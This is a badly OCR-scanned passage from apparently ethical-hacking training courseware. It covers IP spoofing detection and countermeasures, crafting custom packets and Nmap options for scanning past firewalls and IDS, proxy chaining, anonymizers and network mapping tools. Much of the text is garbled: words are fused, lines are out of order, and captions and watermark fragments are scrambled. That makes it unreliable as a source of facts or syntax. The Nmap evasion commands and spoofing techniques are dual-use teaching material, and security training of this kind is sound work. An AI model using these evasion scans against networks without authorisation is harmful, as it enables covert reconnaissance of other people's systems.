the
packet
whethera packet is spoofed,
andobservetheIPIDnumber
must becloseto but slightly greater
to of of
thanthe IPIDvalueoftheprobe packet. Thesource addressthe IP packet is spoofedif
of
the IPID the responsepacket is not close that the probe
ce
o>. a
Target
fer
-
10.0.0.5
391: Figure
TCPFlowControlMethod
P Spoofing detection IPdentfation Number
technique:
occur
Most spoofing
spoofing
attacks during as it is challenging
the handshake,
with the correct sequencenumber.Therefore,
replies
to build multiple
apply
the flow control
spoofed
packet handshake.
the
detectionmethodto the In a TCPhandshake,
ical
hostsending
andCountermensores ©
Mackin by E-Comel
Copyright
SYN waits
SYN-ACK
the
theinitial packet for
aACK beforesending packet.
from a genuine clientor spoofed
you are gettingthe SYNrequest
Tocheck whether
one, set SYN-ACK
to
sends
Thisis because
ACK packet,
an data,
zero. If thesender
means one.
whenSYN-ACK
ACKwithany it that thesender
is a spoofed
is setto zero, the senderm ust respond
withoutadditional
data,
to it only
with the
axtocker
(Spootesadoress
ioaos}
392:1P
Figure Spoofingdetection TC FlowControlMethod
technique
Attackerssending spoofed TCPpackets will not receive the target's
SYN-ACK packets.
Attackerscannot respond to changesi n the congestion windowsize. Whenthe received
trafficcontinues aftera windowsizeis exhausted, the packets spoofed.
are most likely
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures
IP Spoofing
‘Use firewalls
multiple
a depthofprotection
to providemultilayered
‘notely on IP-based
authentication
Use random
initalsequencen umber
to preventIP spoofing
attacks
based number
on sequence spoofing
IngresFitring:Use
roversnetwork
and firewalls
at your t o ler incoming
perimeter packetstha appar
IP Countermeasures
Spoofing
ethical
In
hacking,
ethical
hacker,
does
taskthat anormalhacker as“pen
the
adopting has an
alsoknown the
against
not follow(i.e.,
tester,―to performadditional
countermeasures the respective
vulnerabilities
determined
in yournetwork
through
adopt
is worthless
unless
hacking).
you
Thisis essentialbecause
measuresto protect
knowing
security
themagainst
loopholes
realhackers. As
mentionedpreviously,
targetnetwork.
spoofing
of
IPspoofing
Therefore,to protect a
is one the techniques
apply
that hackeradopts
your networkfromexternalhackers,
countermeasuresto your networksecurity
to breakinto the
you should
SomeIPspoofing
settings. countermeasures
IP
apply as
‘that
you can are follows:
=
relationships
Avoidtrust
Donot relyon IP-based spoof
authentication. Attackersmay themselves as trustedhosts
malicious
packets
andsend
accept
theyare “clean―
your system.
because
Therefore,
packets that
to you.If you these underthe assumption
theyare fromyour trustedhost,the maliciouscodewill infect
itis advisable to test all packets,
even whenthey come fromone
of your trusted hosts.You can avoid this problem by implementing password
authenticationalong
with trust-relationship-based authentication.
Use firewallsandfiltering
mechanisms
{Asstatedabove, you shouldfilteralltheincomingandoutgoing packets to avoidattacks
andsensitive informationloss.Afirewallcan
restrict
malicious
entering
packets
blockunauthorizedaccess,At the same time,there is a possibility
from
privatenetworkandpreventsevere dataloss.Youcan use accesscontrollists(ACLs)
your
to
of an insiderattack
Insideattackerscan sendsensitive informationaboutyour business to your competitors,
whichcouldleadto monetary lossandother issues.Anotherriskof outgoing packets is
i n installing
that an attackerwill succeed a
malicious
sniffing
programrunningi n a hidden
03
Module Page252 ical
© andCountermensores
Mackin Copyright
by E-Comel
modeon yournetwork. Theseprogramsgather andsendall yournetworkinformation
to
the attackerwithout any notificationafter filtering
the outgoingpackets.
Therefore,
you
shouldassignthesame importance to thescanning ofoutgoingpackets
as youwouldto
that of incomingpackets,
Use randominitial sequence
numbers
Most deviceschoose theirISNbased o n timedcounters.Thismakes theISNspredictable,
as an to the of the
itis easyfor attacker
can determine
determine conceptgeneratingISN.Theattacker
the ISNof the next TCPconnection byanalyzing
sessionor connection. If the attackercan predict
the ISNof the current
the ISN,then he/she can establisha
maliciousconnection to the server andsniff out your network traffic.To avoid this risk,
use randominitial sequence numbers,
Ingress
filtering
Ingress
filtering
spoofed
trafficthe
prevents
becauseit enhances
fromenteringInternet.
the functionality
tis appliedrouters
of the routers and blocksspoofed traffic.to
Configuring packets
andusingACLsthat drop
rangeis one methodof implementing
withthe source address
ingressfiltering,
outsidethedefined
Egress
filtering
Egress
filtering
refersto a practice
that aims to preventIP spoofing
byblocking
outgoing
packets
witha source address
that is not inside.
Useencryption
its for
all
If you want to attain maximum networksecurity, then use strongencryption the
trafficplaced onto thetransmissionmediawithout considering typeandlocation.
This
is the bestwayto prevent IPspoofing
attacks.IPseccan beusedto reducethe IPspoofing
risk drastically, as it provides data authentication, and confidentiality
integrity,
Furthermore, ACLscan be usedfor blocking privateIP addressesat the downstream
interfaces. sessions shouldbeenabledon the router
Encryption so that trustedhostscan
communicate securely
with localhosts.Attackerstend to focuson easy-to-compromise
a
of wants
break
f an attacker
targets.
whole
encrypted
packets,
slew
which he
dificult
task.orshe
has
to
thetod
is
l ecrypt
into the encrypted
ikely isa
network,
Therefore, attacker
attempt.Moreover, or
to move on andtryto findanothertargetthat is easyto compromisesimply
usethe latestencryptionalgorithms that provide
abortthe
strongsecurity.
SYNflooding
countermeasures
againstSYNflooding
Countermeasures attackscan also helpyou to avoidIP spoofing
attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
7
CustomPackets
Creating CEH
Py
Caatrm Pecks vingPach
‘resting
Creating
Custom Packets (Cont'd)
‘Creting
(8
Cartom
aches
pending
String
| Creating
Custom
Packets
Packotaby
by
Rppending
poenda Random
number
fandom
Cstom
sondareguarsvingapaylondsinthe
pacers Aacits dt so
Data
Foose
‘
frewat
(example:
"Pha
dtstrng sae (©amp: dotting
Creating
Custom Packets
The attackercreates and sendscustom packets
to scan the intended targetbeyondthe
Various techniques
IDS/firewalls. are used to create custom packets.Some of them are
mentionedbelow:
Creating byusingPacketCrafting
CustomPackets Tools
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
Attackerscreate custom TCPpackets to scan the targetbybypassing the firewalls.
Attackers use various packetcrafting tools such as Colasoft packetbuilder
(https://www.colasoft.com),NetScanTools Pro(https://www.netscantools.com), etc.,to
scan the targetthat is beyondthe firewall.Packetcrafting toolscraftandsendpacket
streams(custom packets)usingdifferentprotocols at different
transferrates.
Colasoft
Packet
Builder
Source:https://www.colasoft.com
ColasoftPacketBuilderis a tool that allowsan attackerto create custom network
packetsand helpssecurityprofessionals assess the network.Theattackerc an select
packet
a TCP fromthe provided templates andchange theparameters i n the decoder,
hexadecimal,or ASCIIeditor to create a packet. In addition to building packets,
Colasoft
PacketBuildersupports savingpackets to packetfilesandsending packets
to
the
network.
eee
fa) 2.2.
F
recite Fact) (GPRS Phew sett
oo
| ATTY
Screenshotof Colasoft
Figure3.93: Packet
Buller
*
aredisplays
views
There three
PacketList
in thePacket
Builder:
Packet
List,
all the constructedpackets.
Decode
Editor,
Editor.
Whenyou selectone or more
andHex
Editor for
Editor editing,
andHex
ical andCountermensores
Mackin ©by E-Comel
Copyright
* In Hex Editor,the dataof the packet
are represented
as hexadecimal
valuesand
ASCIIcharacters;nonprintable a re represented
characters bya dot
or
the
ASCIIsection.You can editeitherthehexadecimal values ASCIIcharacters,
+
Editor
allows
Decode
attacker
length, edit the
the to packets without remembering value
the valuein the
byteorder,andoffsets.Youcan selecta field andchange
edit box.
For packet,
or
creatinga
theToolbarto create a new packet.
command i n theEditmenu
youcan use theaddor insert packet
‘The packet
attackerc an senda constructed to wire directly
andcontrolhowColasoft
PacketBuildersendsthe packets, specifying,
for example,the interval between
packets,
looptimes,anddelay betweenloops.
packet
‘This
andintruders.
bypass
builder
audits networksandchecks
Attackersmayuse thispacket
networkfirewallsandIDSsystems.
the networkprotection
builderto create fragmented
Theycan alsocreate packets
against
attacks
packetsto
andfloodthe
victim with a verylarge
number of packets,
whichcouldresulti n DoSattacks.
Creating
CustomPacketsbyAppending CustomBinary Data
sendbinary
‘Attackers data (0'sand 1's)as payloads
i n the packets
sent to the target
machine presentbehindthefirewall.Theoption usedbyNmap forappending custom
binarydata to the sent packetsis --data <hex string>. Any<hex string> is
specifiedi n the formats OxAABBCCDDEEFF<...>,
AABBCCDDEEFF<...>,
or \XAA\xBB\xCC\xDD\xEE\xFF<...>.
To perform
a byte-order
conversion, the
specified
information
shouldbebasedon thereceiver's expectations.
Attackerscan use
this technique
to scan the targetbymanipulating
the firewallsbyappending
custom
Example:
ordata
binary hex to the sent packets.
--data Oxdeadbeef (or) --data \xCA\xFE\x09
ical andCountermensores
Mackin ©by E-Comel
Copyright
Targee[101010:0 Profi
Command:
[nmap endo
10107010
d ota
Heats
|| | [omap
Senices Nmap
Output Ports/Hosts Topology
Hos Detais Scant
5dat
08 « Host = 10101010 Oadeadbeet
© 0101010 7.7
/owap.0re
)at 2089-06-27
Not_shoun:
filtered
997 ports
5357/tepopen wsdoph
HAC.
Addeess:00: 0¢129:02:96:A4
(VMware)
aan_done:1 IP adress (2 host
up) scanned in 4.81 seconds v
Figure ofappending
3.94:Screenshot binarystingin Zenmap
Creating CustomPacketsbyAppending CustomString
Attackerssendregular stringsas payloads
i n the packets
sent to the targetmachinefor
scanningbeyond the firewall.TheoptionusedbyNmap
the sent packets
is --data-string
and a fewcharacters depend can string
on the system's
to
for appending
<string>. The<string>
location;
however,
a custom string
contain any
it is not guaranteed
Example:
--data-string "Scan conducted by Security Ops, extension
(or)--data-string
7192" "Ph34r my 133t skills".
ical andCountermensores
Mackin ©by E-Comel
Copyright
San Teele Brie Hep
Data
eye ://oeap.ore
)ot 2019-06-27 14:58
Creating
395:Sereenshot
Figure
CustomPacketsbyAppending
of appending
custom
RandomData
string
inZenmap
append
‘Attackers a numberof randomdatabytes to most packets
sent without usingany
protocol-specific
payloads.
TheoptionusedbyNmap forappendingrandomdatato the
sent packetsis --data-length<number>. For protocol-specific and no random
payloads,
affected,
--data-length
as probe 0
is needed
consistency
The (-0)OSdetectionpackets
is used.
for it to be accurate.Bydefault,
are not usually
a few UDPports
get
a
andIPprotocols custom
the
payload. Attackers
bymanipulatingfirewallsbyappending can
use
this to
techniquescanthetarget
randomdataor numbersto the sent packets.
Example:--data-string 1 (or) --data-string5
ical andCountermensores
Mackin ©by E-Comel
Copyright
San Teeleelle Help
Tage {101010:10 Profile
Command:
[nmap
101010: -det-sing §
Hosts) Seviees
05 + Host
| PortsNmap
Output /Hosts
map 1010:10.10-date-singS
Topology
HostDet Scan
eta
@ ro1a1010
( Stacting ap
latency).
ost {5 up (0,008
7.70 netos://omep.oce ) a€2019-06-27 14:56
5357/tepopen wsdapt
AC Address:0 00c!29:02:96:44 (\Mmare)
rs
inap-dene: 1P
1 adaress(1
hostup) scanned in
3.96:Screenshot
Figure of appending
random
string inZenmap
03
Module 259
Page tical andCountermensores
Making Copyright©
by Comet
7
Randomizing
HostOrder and Sending
BadChecksums CEH
Randomizing
HostOrder Sending
BadChecksums
(©
Aackers
i ofin
can the cumber hosts the target
network random
targetthatsbehind
ordert o scan an intended
3 firewall
“errachrs
ehecksumssend
with
intended
othe
Frowaluses tocertain
packets TER/UPD
bador bogus
target avoid
HostOrderand Sending
Randomizing BadChecksums
Randomizing
HostOrder
‘The
attackerscans the numberof hostsi n the target
network i n a randomorder to scan the
intendedtargetthat is lying thefirewall.
beyond TheoptionusedbyNmap to scanwith a random
hostorderis --randomize-hosts.
Thistechnique instructs Nmapto shuffleeachgroupof 16384hostsbeforescanningwith slow
timingoptions, thusmaking the scan lessnotableto networkmonitoring
systems andfirewalls.
If group
sizes
are the
larger
shouldbe compiled
randomized,PING_GROUP_SZ shouldbeincreasedi n nmap..h
again.Anothermethodcan befoliowedbygeneratingtargetIP with
the list scan command~s~ -n ~oN <filename> andthen randomizing
and it
the list
it with a Perlscript
the using
andproviding whole
listto Nmap the -41 command.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=e
inn
genes
(2vo) §
1.3? asaress most scannea in
‘Sending
BadChecksums
Figure
in
397;Sccenshot
of randomiing
hosts Zenmap
Series]
_Nnap Host
Scans
Oost Pats Hess Teplgy Oe
Sceenshotof scanning
Figure3.98: bad checksums
bysending
ical
Zenmap
in
andCountermensores
Mackin ©by E-Comel
Copyright
ProxyServers
A prony
serve i an
that
application can serve asa forconnecting
intsrmesiary with
other
computers
@ Priest musts sana macnn te on
WhyBitackers
© we rmasi
nescuat soure of an attack the fake
byimpersonating
sourceadores f the
Servers?
“otc a
requests
sean8ed sc
srt
httins
ya ran them destin
@ eerie
"Note:
pony
serverst
Asearchin
mile
wl st thousands
Google
sod
offre proxyservers
eteton
Servers
Proxy
‘A
proxy server is an application
that can serve as an intermediary
for connecting
with other
computers.
A proxyserver is used:
+
Asafirewallandto protectthe localnetworkfromexternalattacks.
=
Asan IP addressmultiplexer
that allowsseveralcomputers
to connect to the Internet
whenyou haveonlyone IPaddress (NAT/PAT).
To anonymizewebsurfing(tosome extent).
material(using
To extract unwantedcontent,suchas adsor “unsuitable― specialized
proxyservers}
=
Toprovide
some protection
against attacks.
hacking
To save bandwidth
Howdoesa proxy server work?
Initially, a particular
whenyou use a proxyto request web pageo n an actualserver, the proxy
server receives it. Theproxyserver thensends to the actualserver on your behalf,
your request
It mediates
in the
betweenyou andtheactualserver transmit and
figure
below, to
to the request,as shown respond
ical andCountermensores
Mackin ©by E-Comel
Copyright
Target
Organization
Attacker
In
Figure server fr
3.99:Attacker usinga peony
connecting
tothe target
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘An
is proxy
server,
that a
anonymous
trough
awe works
also called CSI
4
8 server
al
roxy, form
‘9
BestFreeProxyServersforAnonymous
WebSurfing Lien
-
Free WebProxy
KPROXY -
WebProxyAnonymous
Anonymous
Free Proxy -
3.100:Free
Figure
Prony
Servers
ical andCountermensores
Mackin ©by E-Comel
Copyright
ProxyChaining
(©
"royce athe
asr’
©vserreqvets resourceom
ote
the destination
prony to
connects ad pues
verve the request ons?
©Tsprocessis
repented yale prow the i n
servesin
_
a
ProxyChaining
Proxy
chaining
helps
a n attackerto increase his/her
Internet anonymity.Internet anonymity
depends
number
proxies
used
for the
on the of
of proxy servers used,the greater
fetchingtarget
is the attacker's
anonymity.
application;
the
larger
the
number
proxychaining
‘The processis described below:
Theuser requestsa resource fromthedestination.
‘A
proxyclientin the
the proxyserver. user's toa
system connects proxyserver and the requestto
passes
Theproxyserver
next proxyserver. strips
the user’s
identificationinformationandpassesthe request
to the
»
.., 2
2
»8.. 8 ..,
fora te ror
Webserver
Figure3.201:
Proxy
Chaining
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools
Proxy
Steer lows
Prony
|) anorimousiy
onthe
internet
you
withoutdelsingyor
| yout
to vberGhost ou
of
Your
srt
address
yberchoxt OP*SROSPNIdes
| reise th
thorallowing
one
st snonmously
aia
i
fit i
i
Tools
Proxy
Proxy
tools are intendedto allow users to surfthe Internet anonymously
bykeeping
their IP
hiddenthrough
a chain
of SOCKS
or HTTP proxies.These
toolscan alsoact as HTTP,
mail,FTP,
SOCKS,
news,telnet,
andHTTPS
proxyservers.
Switcher
Proxy
+
Source:http://www
proxyswitcher.com
Switcherallows
Proxy
IPaddress.It alsohelps attackers
Internet
anonymously
disclosing
to surthe without their
attackersto access various blockedsites i n the organization.
In
it avoids
addition,
by
all sorts oflimitationsimposed target sites
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bile6t_ Actions View Hep
7 Ex GOS EE7 ss"
boy
Sore
© 5)
Bien
EZ
AGS
TEE
iil
cone
600
ete
os
Ded]
efwnat
“Tet
Tt yar. ose mean CORE
MWC
tee
as
Oe)
become
cere
‘160253157 becausete.
120101465131
SSLTot Honea ratte estes
eed
[ma]
ve)comet
tendon
ve]
10513105
$7742190
1222018 meet
1062372213200
175.00
bacare
3.102 Screenshot
Figure of Prony
Switcher
CyberGhost
VPN
Source:https://www.cyberghostvpn.com
CyberGhost
VPN
hides
the attacker's
her to surf anonymously
connection anddoesnot keeplogs,
IPandreplacesit
thussecuringdata.
a selectedIP,
with allowing
himor
and access blockedor censoredcontent. It encrypts
the
ical andCountermensores
Mackin ©by E-Comel
Copyright
VPNnot connected!
om
3.203:Screenshotof GberGhost
Figure
In additionto theproxytoolsmentionedabove,
thereare manyotherproxytools intended
to
allowusers to
surf
the Internetanonymously.
Someadditionalproxy toolsare listedbelow:
‘BurpSuite(https://www.portswigger.net)
Tor (https://www.torproject.org)
=
CProxy(hetpsi//www.youngzsoft.net)
Shield(https://www.hotspotshield.com)
Hotspot
ical andCountermensores
Mackin ©by E-Comel
Copyright
ToolsforMobile
Proxy
1 Provyrneger
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure Screenshot
3.104 ofshadowsocks
=
ProxyDroid
Source:https://github.com
ProxyDroidis an app that can helpyou to set the proxy (http/socks4/socks5)
on your
Androiddevices.It supports HTTP/HTTPS/SOCKS4/SOCKSS proxyandalsosupports
basic/NTLM/NTLMv2 authenticationmethods.Attackerscan use thistool as a DNS
proxyto accessIP addresses thatare beyond thefirewalls.
BRIO 1207
Proxy
Chooseone
profile
Host
Port
Proxy typ
re 3.105: of PronyDroid
Screenshot
ical andCountermensores
Mackin ©by E-Comel
Copyright
Proxy Manager
Source:https://play.google.com
Proxy
Manager
is anotherAndroid-based HTTP/SOCKS4/SOCKSS
proxy tool that supports
proxyanduser authentication. attackersto surftheInternetanonymously.
It enables
=
1240
I ProxyManager
Proxy
Enable
Fetch
USAProxy
Proxy
Type
Proxy
Host
Proxy
Port
EnableUserAuthentication
AboutProxy
Manager
Sereanshat
Figure3206: of Proxy
Manager
ical
Mackin
and Copyright
©
by
E-Come
Countermensores
Anonymizers
‘An
anonymierremave al deny Information
fromthe
‘Whyaso an Anonymizer?
©
andPrvacy anonymity
against
©Protection
©Aces
onne atads
restricted
content
Knonymizers
anonymizer is an intermediateserver placed
‘An betweenyou as the enduser andthe websiteto
access on
website
the
your
behalf
allowsyou to bypass your
websurfing
activities
untraceable.
andmake
Internetcensors.An anonymizer eliminatesall the identifying
information
Anonymizers
address)
(iP
anonymizers
Internet
while surfing
fromyour system you are
can anonymize
services.
thereby
theweb (HTTP:),
the Internet,
(gopher:)
file transferprotocol (FTP:),
ensuringprivacy.Most
andgopher
Toawebsite
visit
the target
page
can
anonymously, preferred
field.
subsequent
to pointto an anonymizer
site
and
you visit your
your
to anonymize homeof
i n theanonymizationAlternatively,
anonymizer enter thename
you can set
webaccess.In addition,
browser page
you can chooseto
anonymously
information,
provide
proxyserver bymaking
passwords
any
andotherinformationto siteswithout revealing additional
configure
suchas your IP address. Attackersmay
the site name the settingfor the HTTP,
an anonymizer
FTP, Gopher,
as a permanent
andother proxy
optionsi n their application configurationmenu, thereby cloakingtheir maliciousactivities.
WhyUsean Anonymizer?
‘The
reasonsfor usinganonymizers
include:
Ensuring privacy: Protectyour identityby making your web navigationactivities
untraceable.Your privacyis maintained until andunlessyou disclose
your personal
‘Accessing
by out their
informationon the web,for example,filling forms.
government-restricted
citizens
content: Most governmentsprevent from
accessing
certain
websites
deemedor However,
or content
sitescan stillbeaccessed
inappropriatesensitive. these
usingan anonymizer locatedoutsidethe targetcountry.
ical andCountermensores
Mackin ©by E-Comel
Copyright
onlineattacks:An anonymizercan protectyou fromall instancesof
Protectionagainst
online pharming
attacksbyroutingall customer Internettraffic via its protected
ONS
server
NetworkedAnonymizers
‘Anetworked anonymizer firsttransfers
your informationthrough a networkof Internet-
connected
computers
through iton
severalInternetcomputers, it becomes cumbersome the
beforepassing to thewebsite,Because informationpasses
foranyonetryingto track
your informationto establishthe connection betweenyou andthe anonymizer.
to
Example: If you want visit any web page,youhaveto makea request.
firstpassthrough A,B,andCInternetcomputers
Therequest
beforegoingto the website.
will
‘Advantage:
Complication
of the communicationsmakestrafficanalysis
complex.
Disadvantage:
Anymulti-nodenetworkcommunication incurs some degree
of riskof
confidentiality
compromising at each
node.
Single-PointAnonymizers
Single-point anonymizersfirst transfer your information througha websitebefore
sendingit to the targetwebsiteandthen passbackthe informationgathered fromthe
targetwebsiteto you via thewebsiteto protectyour identity,
Advantage: Arms-length communication hidesthe IP addressand related identifying
information.
Disadvantage: trafficanalysis.
It offerslessresistanceto sophisticated
ical andCountermensores
Mackin ©by E-Comel
Copyright
7
CircumventionTools:Alkasir
Censorship and Tails CEH
Atkasir | ‘mest
ces rom
aV0,
crumventont | Snetrton any computer
CircumventionTools
Censorship
+
Alkasir
Source: https://github.com
Alkasiris a cross-platform, open-source, and robustwebsitecensorship circumvention
tool that alsomaps censorship patternsaroundthe world.Alkasirenablesattackersto
identify censored links.It keeps
theminformed aboutlinksthatare stillblockedandlinks
that are not blocked.
3.107:Sereenshotoflkasir
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tails
Source:https://tails.boumn.org
from a DVDdrive,
Tailsis alive OSthat users can run on any computer USBstick,
or SD
card.It uses state-of-the-art cryptographic
to
tools encryptfiles,emails,
andinstant
and
messaging. It allows attackersto use the Internet anonymously circumvent
censorship. It leavesn o trace on thecomputer.
Seeenshotof Tals
Figure3.208:
03
Module 275
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Anonymizers
| designed
‘Whonix torssvancedcurt
ana Psiphon| softwatethat allows
to
sur
attackers
©
x_n
PSIPHON
2)
ISCONNECTED
Knonymizers
anonymizer helps
‘An you to maskyour IPaddress without being
so that you can visit websites
tracked
or
suchas SSH,identified
while
VPN, yourand
keepingactivity identity It usesvarious techniques
protected.
andHTTPproxies,whichallowyou to accessblockedor censoredcontent on
the Internetwith omittedadvertisements.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Whonix
Source:https://www.whonix.org
Whonixis
OS a desktopdesigned
fail-safe,
automatic,
for advanced
of common attackvectors whilemaintaining
and desktop-wide
securityandprivacy. It mitigates
Onlineanonymity
usability.
thethreat
is realized
via
use of the Tornetwork.It consistsof a heavily
reconfiguredDebianbasethat is run inside multiple virtual machines, providinga
substantiallayer
of protection
frommalware
and
address
leaks.
IP
309:
Figure Screenshot
ofWhonix
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Psiphon
Source:https://psiphon.ca
Psiphon
is an open-sourceanonymizer softwarethat allowsattackers
to surfthe Internet
through it will automatically
a secure proxy.Afterinstallation, configure
the Windows
machine'sproxy configurations
i n sucha way that the networktraffic for the web
applications that operatethrough
andbrowsers theseconfigurations
will betunneled
through
Psiphon
©
Pveren3
©
FEEDBACK
apour
toss PSIPHONISCONNECTED
~
DISCONNECT
©
FastestCountry
Module
03 278
Page 1 countermensreCopyriht
©y -Comell
for Mobile
Anonymizers
for Mobile
Anonymizers
+
orbot
Source:https://guardianproject.info
COrbot
is a proxyappthatallows otherappsto use theInternetmore securely.It usesTor
to encrypt Internettrafficandthen hidesit bybouncing through
a series of computers
aroundthe world.Tor is a freesoftwarethat provides
an opennetworkto help defend
your systemagainstany formof networksurveillancethat maycompromise personal
activities and relationships
freedomandprivacyas well as confidentialbusiness through
atypeof state security monitoring analysis.―
knownas “traffic Orbotcreates a truly
privateInternet connection.
ical
Mackin
and Copyright
©
by Countermensores E-Comel
Psiphon
Source: https://psiphon.ca
Psiphon
is a circumvention tool developed
byPsiphon,
Inc.,whichusesVPN,SSH,
and
HTTPproxy technology
to provideyou with open and uncensored a ccess to Internet
Psiphon
content.However, doesnot increaseonlineprivacyandis not an onlinesecurity
tool
Feature:
Browser
‘©
or or
VPN
(whole-device)
justthe webbrowser.
mode:one can choosewhether
totunnel
everything
©. In-app
s tats:Thisletsyou knowhowmuch
trafficyou havebeenusing
03
Module 280
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
OpenDoor
3.122:
Figure Screenshotofsiphon
Source:https://www.apple.com
is an app designed
OpenDoor forbothiPhoneand iPad;
it allowsattackersto browse
websitessmoothly
andanonymously.
Figure
3.113
of ScreenshotOpenDaoe
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow CE
H
[Network
Scanning Port
and Concepts Service Discovery
Tools BD Gamer
Seanning osiscvery crating?
(05Fingerprinting)
Scanning
Beyond
IDSandFirewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkDiagrams
Drawing
(©Adiagram of
target
or
network
1©Network dgramsshow lose
an attacker
provides
physi paths
withvlusbleinformation
to a potential
target network
aboutthe
and ts arhitectre
Intranet Intranet
Seee
eens
Network Diagrams
Drawing
Drawing a networkdiagram helps an attackerto identify the topology or architecture of a target
network. Thenetworkdiagram alsohelps to tracethe path to thetarget hosti n the networkand
enablesthe attackerto understandthe positions of firewalls, IDS,routers,and other access
controldevices.Oncethe attacker
corweakpointsin thesesecurity
to find his/her
mechanisms.
way into thevictim'snetwork.
try
to
hasthisinformation,
Then,
he/she can findthe vulnerabilities
the attackercan exploit theseweaknesses
Thenetwork diagram
networkdiscovery
ofa networkdiagram
alsohelps
is shown
below.
network
administratorsuse
to manage
or mapping tools to drawnetworkdiagrams
theirnetworks. Attackers
of targetnetworks.An example
Intranet Intranet
BS82 &
3.14: Example
Figure
of Digram
Network
ical andCountermensores
Mackin ©by E-Comel
Copyright
Network Discovery
and Mapping
Tools
heute
Network Discovery
and Mapping
Tools
Networkdiscovery andmapping toolsallowyou to view the map of your network.Theyhelpyou
to detectroguehardware andsoftwareviolationsand notify you whenever a particular
host
becomes active or goesdown.Thus, you can alsodetermineserver outages or problems
related
to performance. An attacker can use the same toolsto drawa diagram ofthetargetnetwork,
analyzethe topology, find the vulnerabilitiesor weakpoints,andlaunchan attackbyexploiting
theseweak
‘=
points.
NetworkTopology
Mapper
Source:https://www.solarwinds.com
TheNetworkTopology Mapper tool allowsone to automatically
discoverand create a
Layer of
networkmap the targetnetwork.It can alsodisplay
3 topology
2andLayer
router connections).
data(e.g.,
It can keep
in-depth
switch-to-switch,
trackofnetworkchanges
connectionssuchas OSI
switch-to-node,
andswitch-to-
andallowthe user to perform
inventorymanagement of hardwareandsoftwareassets,
Features:
© Networktopology
discovery
andmapping
discovers
‘Automatically theentire networkandcreates comprehensive
anddetailed
networkmaps
network diagrams
Export to
networkdiagrams
Exports
PNGformats to
Microsoft
Office®
Visio®,
OrionNetworkAtlas, and
PDF,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Networkmappingforregulatorycompliance
Allowsone to directly
addressPCIcompliance
and other regulations
that require
ofan network
maintenance up-to-date diagram
Multi-levelnetworkdiscovery
Performsmulti-levelnetworkdiscoveryto produce an integrated
OSILayer2 and
Layer3 networkmapthat includes
detaileddeviceinformation
ofchanges
‘Auto-detection to networktopology
Automatically
network
detects
new
scanning to
a
andchangesnetworktopology
devices withscheduled
Somenetworkdiscovery
of
Solar
Figure2:15;Screenshot Winds
Netwark Topology
(https://www.manageengine.com)
OpManager
TheDude(https://www.mikrotik.com)
(http://nutsaboutnets.com)
NetSurveyor
NetBrain(https://www.netbraintech.com)
‘Spiceworks Tool(https://www.spiceworks.com)
NetworkMapping
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkDiscovery
Toolsfor Mobile
Seany ‘Network
Analyzer
Network Discovery
=
Scany
Tools for Mobile
Somenetworkdiscovery
toolsfor mobiledevicesare as
POG
follows:
Source:http://happymagenta.com
a networkscanner appforiPhoneandiPad,
‘Scany, scansLAN, Wi-Finetworks,websites,
and open ports,discoversnetworkdevices,and digsnetworkinfo. It supports
several
networking protocols technologies.
andanti-stealth networking
It is a multifunctional
instrument for findingconnecteddevices, lookingup detailed device information,
networktroubleshooting, scanningports,andtestingnetworksecurityandfirewalls.
Attackersuse this tool to scan both the LANandthe Internet,scan any IPaddressor
networkrange,perform hostname, devicename, MACaddress, andhardwarevendor
lookups,ping/trace hostswith integrated toolsandWHOIShostnames, IP addresses,
ASNs,
ete.
ical andCountermensores
Mackin ©by E-Comel
Copyright
3.116:
Figure Screenshot
of Scary
NetworkAnalyzer
Source:https://play.google.com
NetworkAnalyzer can diagnosevarious problems i n the Wi-Fi networksetupor Internet
and it can alsodetectvarious issuesin remote servers basedon its wide
connectivity,
rangeof in-builttools.Attackerscan use it to perform ping, traceroute,
portscanning,
Whois,
lookup
activities.
andDNS
B88
_e
of Network Analyzer
3.117Sereenshot
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
PortDroidNetworkAnalysis
Source:https://play.google.com
Attackerscan use PortDroidNetworkAnalysis
to perform
localnetworkdiscovery.
It is
alsoeffective the networkandperforming
i n analyzing portscanninga s wellas banner
grabbing
using certain protocols,
including
ssh,
telnet,http,https,
ftp,smb,
etc.
Figure
2.118Screenshot
ofNetwork
Analyzer
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
about
te
Drawing of targetnetwork
sagrams n d thee
snfiance i n providing auabe
Information networkand achitectureoan sacar
1Dinthenext
ben we
wl
dec
mule,
testers perform and
calleabouts
an
enumeration
in dei
to
howatackers,a
orton
wel as etcal hackers
argsbefore tack
Module Summary
Thismodulediscussed howattackers determinelive hostsfroma rangeof IP addresses by
sendingvarious ping scan requests to multiple
hosts.It alsodescribedhowattackersperform
differentscanningtechniques to determine open ports,services,service versions, etc.,on the
targetsystem.Furthermore, it explained how attackersperform banner grabbing or OS
fingerprintingto determinethe OSrunningon a remote targetsystem. It alsoillustrated various
scanning techniques that attackerscan adoptto bypass IDS/firewall rules and logging
mechanisms
discussion
andhidethemselves
on drawing
as usualunder
the target’s
networkdiagram network
traffic.
Finally, it ended
and its significance
informationaboutthe networkandits architectureto a n attacker.
with a detailed
i n providing valuable
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module 04:
Enumeration
Module Objectives
Module Objectives
In the previousmodules, you learnedabout footprinting and networkscanning. Thismodule
covers the next phase, enumeration. Westart with an introductionto enumerationconcepts.
Subsequently, the module provides insightinto different techniques for Network Basic
Input/Output System (NetBIOS),
Simple NetworkManagement Protocol(SNMP), Lightweight
Directory AccessProtocol(LDAP), NetworkTimeProtocol(NTP), NetworkFile System (NFS),
Simple Mail TransferProtocol(SMTP),Domain Name System (ONS),Internet ProtocolSecurity
